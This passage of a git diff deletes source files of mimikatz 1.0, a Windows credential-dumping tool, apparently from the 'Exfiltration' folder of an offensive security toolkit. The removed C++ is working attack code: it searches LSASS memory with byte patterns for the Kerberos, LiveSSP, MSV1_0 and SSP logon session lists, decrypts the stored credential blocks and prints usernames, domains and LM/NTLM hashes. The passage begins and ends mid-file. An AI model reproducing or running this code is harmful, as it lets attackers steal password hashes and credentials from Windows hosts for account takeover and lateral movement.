sizeof(PTRN_WALL_KerbUnloadLogonSessionTable); - offset = OFFS_WALL_KerbUnloadLogonSessionTable; -#elif defined _M_IX86 - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - pattern = PTRN_WNO8_KerbUnloadLogonSessionTable; - taille = sizeof(PTRN_WNO8_KerbUnloadLogonSessionTable); - offset = OFFS_WNO8_KerbUnloadLogonSessionTable; - } - else - { - if(mod_system::GLOB_Version.dwBuildNumber < 8400) // petite correction pour avant la RC - PTRN_WIN8_KerbUnloadLogonSessionTable[3] = 0x2c; - pattern = PTRN_WIN8_KerbUnloadLogonSessionTable; - taille = sizeof(PTRN_WIN8_KerbUnloadLogonSessionTable); - offset = OFFS_WIN8_KerbUnloadLogonSessionTable; - } -#endif - } - - if(HMODULE monModule = LoadLibrary(L"kerberos")) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) - { - mod_memory::genericPatternSearch(pointeur, L"kerberos", pattern, taille, offset); - *pointeur += pModKERBEROS->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - FreeLibrary(monModule); - } - } - return (pModKERBEROS && (KerbGlobalLogonSessionTable || KerbLogonSessionList)); -} - -bool WINAPI mod_mimikatz_sekurlsa_kerberos::getKerberosLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchKerberosFuncs()) - { - PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; - DWORD taille; - BYTE * monBuff = NULL; - - if(KerbGlobalLogonSessionTable) - { - taille = sizeof(KIWI_KERBEROS_PRIMARY_CREDENTIAL); - monBuff = new BYTE[taille]; - - if(PKIWI_KERBEROS_PRIMARY_CREDENTIAL pLogSession = reinterpret_cast<PKIWI_KERBEROS_PRIMARY_CREDENTIAL>(mod_mimikatz_sekurlsa::getPtrFromAVLByLuid(KerbGlobalLogonSessionTable, FIELD_OFFSET(KIWI_KERBEROS_PRIMARY_CREDENTIAL, LocallyUniqueIdentifier), logId))) - { - if(mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS)) - { - pLogSession = reinterpret_cast<PKIWI_KERBEROS_PRIMARY_CREDENTIAL>(monBuff); - mesCreds = &pLogSession->credentials; - } - } - } - else - { - taille = sizeof(KIWI_KERBEROS_LOGON_SESSION) + offsetMagic; - monBuff = new BYTE[taille]; - if(PKIWI_KERBEROS_LOGON_SESSION pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(KerbLogonSessionList), FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier) + offsetMagic, logId))) - { - if(mod_memory::readMemory(pLogSession, monBuff, taille, mod_mimikatz_sekurlsa::hLSASS)) - { - pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(monBuff); - if(offsetMagic != 0) - pLogSession = reinterpret_cast<PKIWI_KERBEROS_LOGON_SESSION>(reinterpret_cast<PBYTE>(pLogSession) + offsetMagic); - mesCreds = &pLogSession->credentials; - } - } - } - mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity); - delete [] monBuff; - } - else (*outputStream) << L"n.a. (kerberos KO)"; - - return true; -} diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h deleted file mode 100644 index 1418d4f..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/kerberos.h +++ /dev/null @@ -1,70 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_kerberos { - -private: - typedef struct _KIWI_KERBEROS_LOGON_SESSION - { - struct _KIWI_KERBEROS_LOGON_SESSION *Flink; - struct _KIWI_KERBEROS_LOGON_SESSION *Blink; - DWORD UsageCount; - PVOID unk0; - PVOID unk1; - PVOID unk2; - DWORD unk3; - DWORD unk4; - PVOID unk5; - PVOID unk6; - PVOID unk7; - LUID LocallyUniqueIdentifier; - #ifdef _M_IX86 - DWORD unk8; - #endif - DWORD unk9; - DWORD unk10; - PVOID unk11; - DWORD unk12; - DWORD unk13; - PVOID unk14; - PVOID unk15; - PVOID unk16; - KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; - } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION; - - typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL - { - DWORD unk0; - PVOID unk1; - PVOID unk2; - PVOID unk3; - #ifdef _M_X64 - BYTE unk4[32]; - #elif defined _M_IX86 - BYTE unk4[20]; - #endif - LUID LocallyUniqueIdentifier; - #ifdef _M_X64 - BYTE unk5[44]; - #elif defined _M_IX86 - BYTE unk5[36]; - #endif - KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; - } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL; - - static PKIWI_KERBEROS_LOGON_SESSION KerbLogonSessionList; - static long offsetMagic; - static PRTL_AVL_TABLE KerbGlobalLogonSessionTable; - static bool searchKerberosFuncs(); - -public: - static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModKERBEROS; - static bool getKerberos(vector<wstring> * arguments); - static bool WINAPI getKerberosLogonData(__in PLUID logId, __in bool justSecurity); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp deleted file mode 100644 index 7f64678..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.cpp +++ /dev/null @@ -1,70 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "livessp.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_livessp::pModLIVESSP = NULL; -mod_mimikatz_sekurlsa_livessp::PKIWI_LIVESSP_LIST_ENTRY mod_mimikatz_sekurlsa_livessp::LiveGlobalLogonSessionList = NULL;//reinterpret_cast<mod_mimikatz_sekurlsa_livessp::PKIWI_LIVESSP_LIST_ENTRY>(NULL); - -bool mod_mimikatz_sekurlsa_livessp::getLiveSSP(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getLiveSSPLogonData, wstring(L"livessp"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_livessp::searchLiveGlobalLogonSessionList() -{ -#ifdef _M_X64 - BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[] = {0x48, 0x83, 0x65, 0xdf, 0x00, 0x48, 0x83, 0x65, 0xef, 0x00, 0x48, 0x83, 0x65, 0xe7, 0x00}; -#elif defined _M_IX86 - BYTE PTRN_WALL_LiveUpdatePasswordForLogonSessions[] = {0x89, 0x5d, 0xdc, 0x89, 0x5d, 0xe4, 0x89, 0x5d, 0xe0}; -#endif - LONG OFFS_WALL_LiveUpdatePasswordForLogonSessions = -(5 + 4); - - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && pModLIVESSP && !LiveGlobalLogonSessionList) - { - - PBYTE *pointeur = reinterpret_cast<PBYTE *>(&LiveGlobalLogonSessionList); - if(HMODULE monModule = LoadLibrary(L"livessp")) - { - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), monModule, &mesInfos, sizeof(MODULEINFO))) - { - mod_memory::genericPatternSearch(pointeur, L"livessp", PTRN_WALL_LiveUpdatePasswordForLogonSessions, sizeof(PTRN_WALL_LiveUpdatePasswordForLogonSessions), OFFS_WALL_LiveUpdatePasswordForLogonSessions); - *pointeur += pModLIVESSP->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - FreeLibrary(monModule); - } - } - return (pModLIVESSP && LiveGlobalLogonSessionList); -} - -bool WINAPI mod_mimikatz_sekurlsa_livessp::getLiveSSPLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchLiveGlobalLogonSessionList()) - { - PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds = NULL; - BYTE * monBuffP = new BYTE[sizeof(KIWI_LIVESSP_LIST_ENTRY)], * monBuffC = new BYTE[sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL)]; - if(PKIWI_LIVESSP_LIST_ENTRY pLogSession = reinterpret_cast<PKIWI_LIVESSP_LIST_ENTRY>(mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(LiveGlobalLogonSessionList), FIELD_OFFSET(KIWI_LIVESSP_LIST_ENTRY, LocallyUniqueIdentifier), logId))) - { - if(mod_memory::readMemory(pLogSession, monBuffP, sizeof(KIWI_LIVESSP_LIST_ENTRY), mod_mimikatz_sekurlsa::hLSASS)) - { - pLogSession = reinterpret_cast<PKIWI_LIVESSP_LIST_ENTRY>(monBuffP); - if(pLogSession->suppCreds) - { - if(mod_memory::readMemory(pLogSession->suppCreds, monBuffC, sizeof(KIWI_LIVESSP_PRIMARY_CREDENTIAL), mod_mimikatz_sekurlsa::hLSASS)) - mesCreds = &(reinterpret_cast<PKIWI_LIVESSP_PRIMARY_CREDENTIAL>(monBuffC)->credentials); - } - else (*outputStream) << L"n.s. (SuppCred KO) / "; - } - } - mod_mimikatz_sekurlsa::genericCredsToStream(mesCreds, justSecurity, true); - delete [] monBuffC, monBuffP; - } - else (*outputStream) << L"n.a. (livessp KO)"; - return true; -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h deleted file mode 100644 index 891da63..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/livessp.h +++ /dev/null @@ -1,44 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_livessp { - -private: - typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL - { - DWORD isSupp; // 88h - DWORD unk0; - KIWI_GENERIC_PRIMARY_CREDENTIAL credentials; - } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL; - - typedef struct _KIWI_LIVESSP_LIST_ENTRY - { - struct _KIWI_LIVESSP_LIST_ENTRY *Flink; - struct _KIWI_LIVESSP_LIST_ENTRY *Blink; - PVOID unk0; // 1 - PVOID unk1; // 0FFFFFFFFh - PVOID unk2; // 0FFFFFFFFh - PVOID unk3; // 0 - DWORD unk4; // 0 - DWORD unk5; // 0 - PVOID unk6; // 20007D0h - LUID LocallyUniqueIdentifier; - LSA_UNICODE_STRING UserName; - PVOID unk7; // 2000010Dh - PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds; - } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY; - - static PKIWI_LIVESSP_LIST_ENTRY LiveGlobalLogonSessionList; - static bool searchLiveGlobalLogonSessionList(); - -public: - static mod_process::PKIWI_VERY_BASIC_MODULEENTRY pModLIVESSP; - static bool getLiveSSP(vector<wstring> * arguments); - static bool WINAPI getLiveSSPLogonData(__in PLUID logId, __in bool justSecurity); -}; diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp deleted file mode 100644 index 39fa015..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.cpp +++ /dev/null @@ -1,217 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "msv1_0.h" -#include "..\..\global.h" -PLIST_ENTRY mod_mimikatz_sekurlsa_msv1_0::LogonSessionList = NULL; -PULONG mod_mimikatz_sekurlsa_msv1_0::LogonSessionListCount = NULL; - -bool mod_mimikatz_sekurlsa_msv1_0::getMSV(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0"))); - return mod_mimikatz_sekurlsa::getLogonData(arguments, &monProvider); -} - -bool mod_mimikatz_sekurlsa_msv1_0::searchLogonSessionList() -{ -#ifdef _M_X64 - BYTE PTRN_WIN6_LogonSessionList[] = {0x4C, 0x03, 0xD8, 0x49, 0x8B, 0x03, 0x48, 0x89};//, 0x06, 0x4C, 0x89, 0x5E}; - BYTE PTRN_WIN5_LogonSessionList[] = {0x4C, 0x8B, 0xDF, 0x49, 0xC1, 0xE3, 0x04, 0x48, 0x8B, 0xCB, 0x4C, 0x03, 0xD8}; - - LONG OFFS_WALL_LogonSessionList = -sizeof(long); - LONG OFFS_WN60_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 8 + 7 + 4 + 4 + 2 + 3 + 3 + sizeof(long)); - LONG OFFS_WN61_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 8 + 7 + 4 + 4 + 2 + 3 + 2 + sizeof(long)); - LONG OFFS_WIN5_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 6 + 3 + 8 + 4 + 4 + 2 + 3 + 2 + 2 + sizeof(long)); - LONG OFFS_WIN8_LogonSessionListCount = OFFS_WALL_LogonSessionList - (3 + 4 + 3 + 6 + 3 + 2 + 3 + 7 + 7 + 4 + 4 + 2 + 3 + 2 + sizeof(long)); -#elif defined _M_IX86 - BYTE PTRN_WNO8_LogonSessionList[] = {0x89, 0x71, 0x04, 0x89, 0x30, 0x8D, 0x04, 0xBD}; - BYTE PTRN_WIN8_LogonSessionList[] = {0x89, 0x79, 0x04, 0x89, 0x38, 0x8D, 0x04, 0xB5}; - BYTE PTRN_WN51_LogonSessionList[] = {0xFF, 0x50, 0x10, 0x85, 0xC0, 0x0F, 0x84}; - - LONG OFFS_WNO8_LogonSessionList = -(7 + (sizeof(LONG))); - LONG OFFS_WIN8_LogonSessionList = -(6 + 3 + 3 + 2 + 2 + (sizeof(LONG))); - LONG OFFS_WN51_LogonSessionList = sizeof(PTRN_WN51_LogonSessionList) + 4 + 5 + 1 + 6 + 1; - LONG OFFS_WNO8_LogonSessionListCount = OFFS_WNO8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 3 + 1 + sizeof(long)); - LONG OFFS_WIN5_LogonSessionListCount = OFFS_WNO8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 1 + 3 + 1 + sizeof(long)); - LONG OFFS_WIN8_LogonSessionListCount = OFFS_WIN8_LogonSessionList - (3 + 6 + 1 + 2 + 6 + 3 + 2 + 3 + 1 + sizeof(long)); -#endif - if(mod_mimikatz_sekurlsa::searchLSASSDatas() && mod_mimikatz_sekurlsa::hLsaSrv && mod_mimikatz_sekurlsa::pModLSASRV && !LogonSessionList) - { - PBYTE *pointeur = NULL; PBYTE pattern = NULL; ULONG taille = 0; LONG offsetListe = 0, offsetCount = 0; -#ifdef _M_X64 - offsetListe = OFFS_WALL_LogonSessionList; - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pattern = PTRN_WIN5_LogonSessionList; - taille = sizeof(PTRN_WIN5_LogonSessionList); - offsetCount = OFFS_WIN5_LogonSessionListCount; - } - else - { - pattern = PTRN_WIN6_LogonSessionList; - taille = sizeof(PTRN_WIN6_LogonSessionList); - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - offsetCount = (mod_system::GLOB_Version.dwMinorVersion < 1) ? OFFS_WN60_LogonSessionListCount : OFFS_WN61_LogonSessionListCount; - else - offsetCount = OFFS_WIN8_LogonSessionListCount; - } -#elif defined _M_IX86 - if(mod_system::GLOB_Version.dwBuildNumber < 8000) - { - if((mod_system::GLOB_Version.dwMajorVersion == 5) && (mod_system::GLOB_Version.dwMinorVersion == 1)) - { - pattern = PTRN_WN51_LogonSessionList; - taille = sizeof(PTRN_WN51_LogonSessionList); - offsetListe = OFFS_WN51_LogonSessionList; - } - else - { - pattern = PTRN_WNO8_LogonSessionList; - taille = sizeof(PTRN_WNO8_LogonSessionList); - offsetListe = OFFS_WNO8_LogonSessionList; - offsetCount = (mod_system::GLOB_Version.dwMajorVersion < 6) ? OFFS_WIN5_LogonSessionListCount : OFFS_WNO8_LogonSessionListCount; - } - } - else - { - pattern = PTRN_WIN8_LogonSessionList; - taille = sizeof(PTRN_WIN8_LogonSessionList); - offsetListe = OFFS_WIN8_LogonSessionList; - offsetCount = OFFS_WIN8_LogonSessionListCount; - } -#endif - MODULEINFO mesInfos; - if(GetModuleInformation(GetCurrentProcess(), mod_mimikatz_sekurlsa::hLsaSrv, &mesInfos, sizeof(MODULEINFO))) - { - pointeur = reinterpret_cast<PBYTE *>(&LogonSessionList); - if(mod_memory::genericPatternSearch(pointeur, L"lsasrv", pattern, taille, offsetListe)) - { - *pointeur += mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - if(offsetCount) - { - pointeur = reinterpret_cast<PBYTE *>(&LogonSessionListCount); - if(mod_memory::genericPatternSearch(pointeur, L"lsasrv", pattern, taille, offsetCount)) - *pointeur += mod_mimikatz_sekurlsa::pModLSASRV->modBaseAddr - reinterpret_cast<PBYTE>(mesInfos.lpBaseOfDll); - } - } - } - } - return (mod_mimikatz_sekurlsa::hLsaSrv && mod_mimikatz_sekurlsa::pModLSASRV && LogonSessionList && (((mod_system::GLOB_Version.dwMajorVersion == 5) && (mod_system::GLOB_Version.dwMinorVersion == 1)) || LogonSessionListCount)); -} - -bool WINAPI mod_mimikatz_sekurlsa_msv1_0::getMSVLogonData(__in PLUID logId, __in bool justSecurity) -{ - if(searchLogonSessionList()) - { - LONG offsetToLuid, offsetToCredentials; - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - offsetToLuid = FIELD_OFFSET(KIWI_MSV1_0_LIST_5, LocallyUniqueIdentifier); - offsetToCredentials = FIELD_OFFSET(KIWI_MSV1_0_LIST_5, Credentials); - } - else - { - offsetToLuid = FIELD_OFFSET(KIWI_MSV1_0_LIST_6, LocallyUniqueIdentifier); - offsetToCredentials = FIELD_OFFSET(KIWI_MSV1_0_LIST_6, Credentials); - if(mod_system::GLOB_Version.dwBuildNumber >= 8000) // pas encore pris le temps de regarder les structures de 8 - { -#ifdef _M_X64 - offsetToCredentials += 4*sizeof(PVOID); -#elif defined _M_IX86 - offsetToCredentials += 2*sizeof(PVOID); -#endif - } - } - - ULONG nbListes = 0; - if(LogonSessionListCount) - mod_memory::readMemory(LogonSessionListCount, &nbListes, sizeof(nbListes), mod_mimikatz_sekurlsa::hLSASS); - else nbListes = 1; - - PLIST_ENTRY pLogSession = NULL; - for(ULONG i = 0; i < nbListes; i++) - { - if(pLogSession = mod_mimikatz_sekurlsa::getPtrFromLinkedListByLuid(reinterpret_cast<PLIST_ENTRY>(LogonSessionList + i), offsetToLuid, logId)) - { - BYTE * kiwiMSVListEntry = new BYTE[offsetToCredentials + sizeof(PVOID)]; - if(mod_memory::readMemory(pLogSession, kiwiMSVListEntry, offsetToCredentials + sizeof(PVOID), mod_mimikatz_sekurlsa::hLSASS)) - { - PVOID monPtr = *reinterpret_cast<PVOID *>(kiwiMSVListEntry + offsetToCredentials); - if(monPtr) - { - BYTE * kiwiMSVCredentials = new BYTE[sizeof(KIWI_MSV1_0_CREDENTIALS)]; - if(mod_memory::readMemory(monPtr, kiwiMSVCredentials, sizeof(KIWI_MSV1_0_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS)) - { - PKIWI_MSV1_0_CREDENTIALS mesCreds = reinterpret_cast<PKIWI_MSV1_0_CREDENTIALS>(kiwiMSVCredentials); - if(mesCreds->PrimaryCredentials) - { - BYTE * kiwiMSVPrimaryCredentials = new BYTE[sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS)]; - if(mod_memory::readMemory(mesCreds->PrimaryCredentials, kiwiMSVPrimaryCredentials, sizeof(KIWI_MSV1_0_PRIMARY_CREDENTIALS), mod_mimikatz_sekurlsa::hLSASS)) - { - decryptAndDisplayCredsBlock(&reinterpret_cast<PKIWI_MSV1_0_PRIMARY_CREDENTIALS>(kiwiMSVPrimaryCredentials)->Credentials, justSecurity); - } else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_PRIMARY_CREDENTIALS KO)"; - delete [] kiwiMSVPrimaryCredentials; - - } else (*outputStream) << L"n.s. (PrimaryCredentials KO)"; - - }else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_CREDENTIALS KO)"; - delete [] kiwiMSVCredentials; - - } else (*outputStream) << L"n.s. (Credentials KO)"; - - } else (*outputStream) << L"n.e. (Lecture KIWI_MSV1_0_LIST KO)"; - delete [] kiwiMSVListEntry; - - break; - } - } - if(!pLogSession) - (*outputStream) << L"n.t. (LUID KO)"; - } - else (*outputStream) << L"n.a. (msv1_0 KO)"; - return true; -} - -bool mod_mimikatz_sekurlsa_msv1_0::decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity) -{ - if(monBlock->Length > 0 && monBlock->MaximumLength > 0 && monBlock->Buffer) - { - BYTE * monBuffer = new BYTE[monBlock->MaximumLength]; - if(mod_memory::readMemory(monBlock->Buffer, monBuffer, monBlock->MaximumLength, mod_mimikatz_sekurlsa::hLSASS)) - { - mod_mimikatz_sekurlsa::SeckPkgFunctionTable->LsaUnprotectMemory(monBuffer, monBlock->Length); - PMSV1_0_PRIMARY_CREDENTIAL mesCreds = reinterpret_cast<PMSV1_0_PRIMARY_CREDENTIAL>(monBuffer); - - NlpMakeRelativeOrAbsoluteString(mesCreds, &mesCreds->UserName, false); - NlpMakeRelativeOrAbsoluteString(mesCreds, &mesCreds->LogonDomainName, false); - - wstring lmHash = mod_text::stringOfHex(mesCreds->LmOwfPassword, sizeof(mesCreds->LmOwfPassword)); - wstring ntHash = mod_text::stringOfHex(mesCreds->NtOwfPassword, sizeof(mesCreds->NtOwfPassword)); - - if(justSecurity) - (*outputStream) << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }"; - else - { - (*outputStream) << endl << - L"\t * Utilisateur : " << mod_text::stringOfSTRING(mesCreds->UserName) << endl << - L"\t * Domaine : " << mod_text::stringOfSTRING(mesCreds->LogonDomainName) << endl << - L"\t * Hash LM : " << lmHash << endl << - L"\t * Hash NTLM : " << ntHash; - } - } else (*outputStream) << L"n.e. (Lecture Block Credentials KO)"; - - delete [] monBuffer; - } else (*outputStream) << L"n.s. (Block Credentials KO)"; - - return true; -} - -void mod_mimikatz_sekurlsa_msv1_0::NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative) -{ - if(String->Buffer) - String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress))); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h deleted file mode 100644 index cf8ccac..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/msv1_0.h +++ /dev/null @@ -1,105 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../mod_mimikatz_sekurlsa.h" - -class mod_mimikatz_sekurlsa_msv1_0 { - -private: - typedef struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS { - PVOID unk0; // next? - LSA_UNICODE_STRING Primary; - LSA_UNICODE_STRING Credentials; - } KIWI_MSV1_0_PRIMARY_CREDENTIALS, *PKIWI_MSV1_0_PRIMARY_CREDENTIALS; - - typedef struct _KIWI_MSV1_0_CREDENTIALS { - PVOID unk0; // next? - DWORD AuthenticationPackageId; - PVOID PrimaryCredentials; - } KIWI_MSV1_0_CREDENTIALS, *PKIWI_MSV1_0_CREDENTIALS; - - typedef struct _KIWI_MSV1_0_LIST_5 { - struct _KIWI_MSV1_0_LIST_5 *Flink; - struct _KIWI_MSV1_0_LIST_5 *Blink; - LUID LocallyUniqueIdentifier; - LSA_UNICODE_STRING UserName; - LSA_UNICODE_STRING Domaine; - PVOID unk14; // 0 - PVOID unk15; // 0 - PVOID unk16; // offset unk_181A080 - DWORD unk17; // 0Ah - DWORD unk18; // 2 - #ifdef _M_IX86 - DWORD unk19; - #endif - DWORD unk20; // 5AC4186Ch - DWORD unk21; // 1CD6BFDh - LSA_UNICODE_STRING LogonServer; - PKIWI_MSV1_0_CREDENTIALS Credentials; - PVOID unk22; // 0C14h - PVOID unk23; // 0BFCh - } KIWI_MSV1_0_LIST_5, *PKIWI_MSV1_0_LIST_5; - - typedef struct _KIWI_MSV1_0_LIST_6 { - struct _KIWI_MSV1_0_LIST_6 *Flink; - struct _KIWI_MSV1_0_LIST_6 *Blink; - PVOID unk0; // unk_18457A0 - DWORD unk1; // 0FFFFFFFFh - DWORD unk2; // 0 - PVOID unk3; // 0 - PVOID unk4; // 0 - PVOID unk5; // 0 - PVOID unk6; // 0C04h - PVOID unk7; // 0 - PVOID unk8; // 0C08h - PVOID unk9; // 0 - PVOID unk10; // 0 - DWORD unk11; // 0 - DWORD unk12; // 0 - PVOID unk13; // offset off_18456A0 - LUID LocallyUniqueIdentifier; - LUID SecondaryLocallyUniqueIdentifier; - LSA_UNICODE_STRING UserName; - LSA_UNICODE_STRING Domaine; - PVOID unk14; // 0 Windows 8 + 2*PVOID / 4*PVOID!! - PVOID unk15; // 0 - PVOID unk16; // offset unk_181A080 - DWORD unk17; // 0Ah - DWORD unk18; // 2 - #ifdef _M_IX86 - DWORD unk19; - #endif - DWORD unk20; // 5AC4186Ch - DWORD unk21; // 1CD6BFDh - LSA_UNICODE_STRING LogonServer; - PKIWI_MSV1_0_CREDENTIALS Credentials; - PVOID unk22; // 0C14h - PVOID unk23; // 0BFCh - } KIWI_MSV1_0_LIST_6, *PKIWI_MSV1_0_LIST_6; - - typedef struct _MSV1_0_PRIMARY_CREDENTIAL { - LSA_UNICODE_STRING LogonDomainName; - LSA_UNICODE_STRING UserName; - BYTE NtOwfPassword[0x10]; - BYTE LmOwfPassword[0x10]; - BOOLEAN NtPasswordPresent; - BOOLEAN LmPasswordPresent; - wchar_t BuffDomaine[MAX_DOMAIN_LEN]; - wchar_t BuffUserName[MAX_USERNAME_LEN]; - } MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL; - - static void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true); - - static PLIST_ENTRY LogonSessionList; - static PULONG LogonSessionListCount; - static bool searchLogonSessionList(); - - static bool decryptAndDisplayCredsBlock(LSA_UNICODE_STRING * monBlock, bool justSecurity); -public: - static bool getMSV(vector<wstring> * arguments); - static bool WINAPI getMSVLogonData(__in PLUID logId, __in bool justSecurity); -};
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp b/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp deleted file mode 100644 index 86dab86..0000000 --- a/Exfiltration/mimikatz-1.0/mimikatz/modules/Security Packages/ssp.cpp +++ /dev/null @@ -1,92 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "ssp.h" -#include "..\..\global.h" -mod_process::PKIWI_VERY_BASIC_MODULEENTRY mod_mimikatz_sekurlsa_ssp::pModMSV = NULL; -mod_mimikatz_sekurlsa_ssp::PKIWI_SSP_CREDENTIAL_LIST_ENTRY mod_mimikatz_sekurlsa_ssp::SspCredentialList = NULL; - -bool mod_mimikatz_sekurlsa_ssp::getSSP(vector<wstring> * arguments) -{ - vector<pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<mod_mimikatz_sekurlsa::PFN_ENUM_BY_LUID, wstring>(getSSPLogonData, 